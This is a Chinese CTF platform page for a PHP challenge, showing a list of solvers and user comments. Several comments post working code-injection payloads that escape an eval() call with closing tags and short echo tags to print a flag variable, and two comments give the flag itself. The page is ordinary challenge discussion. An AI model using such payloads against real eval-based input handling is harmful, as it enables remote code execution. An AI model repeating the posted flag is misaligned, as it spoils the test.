评分(6)
解题动态
cc737 攻破了该题 1小时前
韩忆舟hanyiz 攻破了该题 2天前
soha 攻破了该题 2天前
blueboat 攻破了该题 2天前
jiamin 攻破了该题 3天前
AAAwww 攻破了该题 4天前
ucole 攻破了该题 6天前
SDLbyZ 攻破了该题 7天前
225070112 攻破了该题 8天前
20207097 攻破了该题 11天前
Lan0818 攻破了该题 12天前
17807032991 攻破了该题 15天前
xjuqq 攻破了该题 16天前
ctf88 攻破了该题 21天前
勇敢的MAN 攻破了该题 22天前
flag与她皆失 攻破了该题 22天前
sasa 攻破了该题 23天前
zy07020304 攻破了该题 25天前
xiaobai19860830 攻破了该题 25天前
评论
孙谦的鸟岛 1月前
举报
孙千的**来咯
派大星CTF 10月前
举报
eavl()会开启新的php标签,而不是闭合第一行代码的标签所以需要结束eval里开启的标签,在开启一个php代码来执行输出$flag
YUMEKO 1年前
举报
http://xxxxxxxxxx/?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111333
Daniel2023 1年前
举报
payload: /?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111111
coo1an 2年前
举报
1、长度是年9, 2、利用短标签和替代,<?php echo $flag;?>使用短标签(<? echo $flag;?>,,再继续使用短标签替代echo ,<?= $flag;?> flag=$f=%274lag%27;$f{0}=%27f%27;?%3E%3C?=$$f;?%3E111111111111111111
110-没办法 2年前
举报
flag{78062956}
wxy1343 2年前
举报
flag{78062956}
w登临意 2年前
举报
好难
阿Q啊 3年前
举报
但是不精通php不会写,就很难受,只能看别人的writeup的payload
阿Q啊 3年前
举报
这题关键在于eval函数,绕过前面几个if的判断条件进入到最后一个if判断条件,由于存在eval函数,可以构造php代码执行,直接输出flag,这题有意思!!